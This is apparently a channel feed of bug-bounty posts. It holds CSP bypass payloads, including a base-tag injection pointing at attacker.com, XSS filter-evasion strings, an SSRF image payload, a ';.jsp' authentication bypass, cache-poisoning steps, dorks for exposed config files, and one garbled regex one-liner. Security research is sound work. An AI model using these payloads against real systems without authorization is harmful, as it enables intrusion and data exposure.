2777
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
#AppSec
#WebApp_Security
1. Critical UXSS in Opera Browser
renwa/when-ctf-meets-bug-bounty-a-critical-uxss-in-opera-browser-ee16f389e555" rel="nofollow">https://medium.com/@renwa/when-ctf-meets-bug-bounty-a-critical-uxss-in-opera-browser-ee16f389e555
// Leak open tab URLs (flag included)
2. Subverting code integrity checks to locally backdoor Signal, 1Password, Slack, and more
https://blog.trailofbits.com/2025/09/03/subverting-code-integrity-checks-to-locally-backdoor-signal-1password-slack-and-more
// deep dive into Electron CVE-2025-55305
3. RCE though vulnerability in Facebook Messenger for Windows
https://www.vulnano.com/2025/09/remote-code-execution-though.html
// Attacker: Pixel Fold, Android 14. Victim: Windows 11 Home 22H
#Space_Security
#WLAN_Security
"GPS Spoofing Attacks on Automated Frequency Coordination System in Wi-Fi 6E and Beyond", 2025.
// ..we demonstrate that GPS-based location reporting, which Wi-Fi APs use, can be spoofed using inexpensive, off-the-shelf radio equipment. This enables attackers to manipulate AP behavior, gain unauthorized spectrum access, cause harmful interference, or disable APs entirely by spoofing them into foreign locations
See also:
]-> GNSS-WASP: GNSS Wide Area SPoofing (.pdf)
Free Recon Course and Methodology For Bug Bounty Hunters
https://www.youtube.com/watch?v=evyxNUzl-HA
Web Cache Poisoning
small✅ checklist
Read Full Article : Aacle/web-cache-poisoning-part-2-weaponizing-headers-url-discrepancies-bbb7b2c0159a" rel="nofollow">https://medium.com/@Aacle/web-cache-poisoning-part-2-weaponizing-headers-url-discrepancies-bbb7b2c0159a
• Test X-Forwarded-*, X-Host, X-Original-URL, User-Agent for reflection.
• Check Vary and target UA-specific poisoning when relevant.
• Try encoded dot-segments (%2e%2e, %2f, %5c) and observe X-Cache
• Test .css / .js extension flip on sensitive endpoints (CSPT)
• Seed cache via Burp parallel requests (first .js then main HTML)
• Use fresh IPs, low request rate, and record X-Cache, Age, CF-Cache-Status
• Run delimiter discovery (append random suffix → insert delimiter → compare).
🔥 SSRF hunters — 3 tiny tricks that turn “maybe” into provable (one-request) POCs — read the full playbook👇
• ⏱️ Timing-delay
• 🔁 Subdomain-rotation
• 🏷️ Header-correlation
Read the full Medium guide ➡️ Aacle/ssrf-part-3-advanced-tricks-timing-channels-out-of-the-box-detection-693c07c97015" rel="nofollow">https://medium.com/@Aacle/ssrf-part-3-advanced-tricks-timing-channels-out-of-the-box-detection-693c07c97015
First, understand this :
Content Security Policy = No XSS
It just means "XSS with extra steps"
🟩 : 70% of CSPs I encounter have misconfigurations that make them completely useless. #bugbounty #infosec
Here are the 👇 5 deadly mistakes developers make:
𝗠𝗶𝘀𝘁𝗮𝗸𝗲 #𝟭: '𝘂𝗻𝘀𝗮𝗳𝗲-𝗶𝗻𝗹𝗶𝗻𝗲'
If you see this in script-src, you've already won.
Policy: script-src 'self' 'unsafe-inline'
Bypass: <script>alert(1)</script>
It literally allows ALL inline scripts.
𝗠𝗶𝘀𝘁𝗮𝗸𝗲 #𝟮: 𝗪𝗶𝗹𝗱𝗰𝗮𝗿𝗱 𝗗𝗼𝗺𝗮𝗶𝗻𝘀 (*.𝗴𝗼𝗼𝗴𝗹𝗲.𝗰𝗼𝗺)
"It's Google, what could go wrong?"
Everything.
This JSONP endpoint on Google works on tons of apps: http://
accounts.google.com/o/oauth2/revoke?callback=alert
𝗠𝗶𝘀𝘁𝗮𝗸𝗲 #𝟯: 𝗠𝗶𝘀𝘀𝗶𝗻𝗴 𝗯𝗮𝘀𝗲-𝘂𝗿𝗶
This is my favorite because it's ALWAYS overlooked.
Inject: <base href="https://attacker.com">
Now ALL relative script paths load from your domain.
𝗠𝗶𝘀𝘁𝗮𝗸𝗲 #𝟰: 𝗙𝗶𝗹𝗲 𝗨𝗽𝗹𝗼𝗮𝗱𝘀 𝗼𝗻 𝗪𝗵𝗶𝘁𝗲𝗹𝗶𝘀𝘁𝗲𝗱 𝗗𝗼𝗺𝗮𝗶𝗻𝘀
Policy: script-src 'self' http://cdn.example.com
If you can upload files to that CDN → game over.
upload a .js file disguised as a profile picture. Direct S3 URL. Loaded as script.
𝗠𝗶𝘀𝘁𝗮𝗸𝗲 #𝟱: 𝗧𝗿𝘂𝘀𝘁𝗶𝗻𝗴 𝗖𝗗𝗡𝘀 𝘄𝗶𝘁𝗵 𝗢𝗹𝗱 𝗟𝗶𝗯𝗿𝗮𝗿𝗶𝗲𝘀
AngularJS versions < 1.6.0 have sandbox escapes.
If a whitelisted domain hosts old Angular → you can execute code.
Check http://ajax.googleapis.com for old versions. This works more often than you'd think.
𝗧𝗵𝗶𝘀 𝗶𝘀 𝗷𝘂𝘀𝘁 𝘁𝗵𝗲 𝗯𝗲𝗴𝗶𝗻𝗻𝗶𝗻𝗴.
𝗣𝗮𝗿𝘁 𝟮: Advanced nonce exploitation, AngularJS escapes, service workers
𝗣𝗮𝗿𝘁 𝟯: DOM clobbering, mutation XSS, scriptless attacks
𝗙𝘂𝗹𝗹 𝗴𝘂𝗶𝗱𝗲 + 𝘁𝗲𝘀𝘁𝗶𝗻𝗴 𝗰𝗵𝗲𝗰𝗸𝗹𝗶𝘀𝘁:
Aacle/a-bug-hunters-guide-to-csp-bypasses-part-1-69b606fd2699" rel="nofollow">https://medium.com/@Aacle/a-bug-hunters-guide-to-csp-bypasses-part-1-69b606fd2699
This book is for for understanding how API's works and developed
Читать полностью…
🚨CVE-2025-64095 (CVSS 10.0) : A Critical Flaw in DNN Platform Allows Unauthenticated Website Overwrite
⚡Dorks
HUNTER : http://product.name="DotNetNuke"
Extract all endpoints from a JS File and take your bug 🐞
- Method onewaybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu
- Method twocat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt
#infosec #cybersec #bugbountytips
☄️JSRecon-Buddy - A simple browser extension to quickly find interesting security-related information on a webpage.
🔴https://github.com/TheArqsz/JSRecon-Buddy
Black Hat USA 2025 Slides and files
Conference presentation slides
🔼GitHub
🔼InfoCon
❤ Share & Support & Reaction Us
🧩 #event
Hey Hunter's,
DarkShadow here back again!
SSRF in pdf generation!
this api endpoint send the pdf generation request:
POST /api/v1/convert/markdown/pdf
Add this payload:
<img src=‘burp collab url’ />
comes 200ok and hit request in burp collaborator.
You can follow me in my x.com/darkshadow2bd
#ssrf #bugbountytips
☄️ Cheapest VPS for Bug Bounty & Pentesting
⚠️ https://brutsecurity.medium.com/cheapest-vps-for-bug-bounty-pentesting-fc6686572ee3
☄️ Malicious PDF Generator - Generate a bunch of malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh
✨ https://github.com/jonaslejon/malicious-pdf
#DevOps
#MLSecOps
#Whitepaper
"DoD Artificial Intelligence Cybersecurity Risk Management Tailoring Guide", Ver.2, July 2025.
// This guidance applies to any AI system used or operated by DoD Components and presents tailored guidance for system owners and authorizing officials to use when authorizing an AI system for operational use
#AIOps
#MLSecOps
"Cybersecurity AI: Hacking the AI Hackers via Prompt Injection", Aug. 2025.
]-> Prompt injection mitigation
// We present PoC exploits against the Cybersecurity AI (CAI) framework and its CLI tool, and detail our mitigations against such attacks in a multi-layered defense implementation
https://github.com/DivyanshGoel259/Churn-Prediction
Finally our first ANN project in which we trained a model for "Churn Prediction"
Part - 2
Web Cache Poisoning
Quick tip: test X-Forwarded-Host + extension flips (.css/.js) — if the edge caches your reflected header or JSON as a “static” asset, every visitor can get poisoned JS or tokens.
Read 5 practical PoCs & seeding recipes →
Aacle/web-cache-poisoning-part-2-weaponizing-headers-url-discrepancies-bbb7b2c0159a" rel="nofollow">https://medium.com/@Aacle/web-cache-poisoning-part-2-weaponizing-headers-url-discrepancies-bbb7b2c0159a
Web Cache Poisoning Tips
Attacker mindset — don’t bruteforce: look for what the cache keys include. Host headers, cookies, query strings, Accept headers, and odd edge-case headers often end up in the key.
Make the app include your input in the key → you control cached output.
Read Full Article : Aacle/web-cache-poisoning-part-1-understanding-the-beast-d303f1741e48" rel="nofollow">https://medium.com/@Aacle/web-cache-poisoning-part-1-understanding-the-beast-d303f1741e48
How to Hack JWT using Burp Suite?
https://payatu.com/blog/jwt-vulnerabilities/
🔐 *How to Secure Your APIs – A Practical Guide*
APIs are the backbone of modern apps — but without security, they become open doors to attacks. Here's how to lock them down effectively:
---
✅ *1. Use Authentication & Authorization*
- Implement *OAuth2*, *JWT*, or *API keys*
- Enforce *role-based access control (RBAC)*
---
🔐 *2. Validate Inputs Strictly*
- Sanitize user inputs
- Use strong data validation (e.g., Joi, Yup)
- Prevent SQL & NoSQL injection
---
📦 *3. Rate Limiting & Throttling*
- Control request frequency to avoid abuse
- Use tools like *NGINX*, *API Gateway*, or *Cloudflare*
---
📜 *4. Use HTTPS Everywhere*
- Encrypt all data in transit
- Never expose APIs over HTTP
---
🕵️♂️ *5. Monitor & Log*
- Track unusual behavior
- Use centralized logging (e.g., ELK, Datadog)
---
🧱 *6. CORS & Firewall Rules*
- Restrict allowed origins
- Protect using *WAFs* and IP whitelisting
---
Secure APIs = Safe apps + Protected data + Trusted users
Build smart. Build safe.
🌐A big curated list of awesome resources useful during Penetration testing, Vulnerability assessments, Red/Blue Team operations, Bug Bounty and more🧠
Online tools for search info about:
- exploit⭐️
- vulnerabilities⭐️
- people⭐️
- emails⭐️
- phone numbers⭐️
- domains⭐️
- certificates⭐️
and more❤️.
https://github.com/edoardottt/awesome-hacker-search-engines
Learn Hacking from Basic to Pro❤️
Hey Hunter's,
Darkshadow here back again!
✨Authentication bypass method:
✅Steps:
1. Target..com/carbon/server-admin/memory_info.jsp = redirect to login page [301 status]
2. Target..com/carbon/server-admin/memory_info.jsp;.jsp = gives the page content without authentication [200 status]
Payload 👉🏼 ;.jsp
Hey Hunters,
DarkShadow here back again, dropping an
interesting XSS input sanitization bypass method.
You might have noticed that most websites currently use input sanitization by blocking certain tags and events, right!? Not really 😅
Okay, so first, have a look at some example tags that could trigger XSS:
script, img, a, iframe, object, video, audio, form, meta
<script>alert(1)</script>
alert(1)
<script <img>> alert(1) </script </img>>
<script <img>>
<script <img>> → remove <img> → <script>
</script </img>> → remove </img> → </script>
<script>alert(1)</script>
JSMap Inspector - A powerful, offline, single-file HTML tool designed for developers and security researchers to inspect and analyze JavaScript Source Map (.js.map) files.
https://github.com/ynsmroztas/JSMap-Inspector
🌀Download all bug bounty programs domains in scope items 🎯
😉Get a full list of domains from active bug bounty programs across platforms like HackerOne, Bugcrowd, Intigriti, and more – all in one place!💥
👇🏼Step 1: Download the domains.txt file
📂step 2: Extract only main/root domains
`cat domains.txt | awk -F '.' '{print $(NF-1)"."$NF}' | grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' | sort -u > main_domains`
📂Step 3: Extract all IP addresses:
`grep -Eo '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' domains.txt > ips.txt`
Don't forget to give reactions❤️
🔥Oneliner to download ALL of @assetnote's wordlists:
⌨️ wget -r --no-parent -R "index.html*" wordlists-cdn.assetnote.io/data/ -nH -e robots=off
Google Dork - XSS Prone Parameters 🔥site:example[.]com inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:&
🔥Google Dork - Exposed Configs 🔍site:example[.]com ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess | ext:json©TakSec